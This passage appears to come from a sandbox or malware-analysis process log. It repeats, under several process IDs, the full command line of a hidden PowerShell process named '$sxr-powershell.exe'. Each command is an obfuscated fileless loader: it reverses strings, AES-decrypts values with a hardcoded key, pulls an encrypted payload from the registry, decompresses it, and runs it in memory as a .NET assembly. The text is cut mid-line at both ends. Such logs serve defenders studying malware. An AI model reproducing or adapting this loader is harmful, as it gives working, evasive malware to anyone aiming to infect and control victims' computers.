'')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        32⤵
        
        PID:4924
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(10108).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        32⤵
        
        PID:4588
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(10108).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        32⤵
        
        PID:9572
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(10108).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object 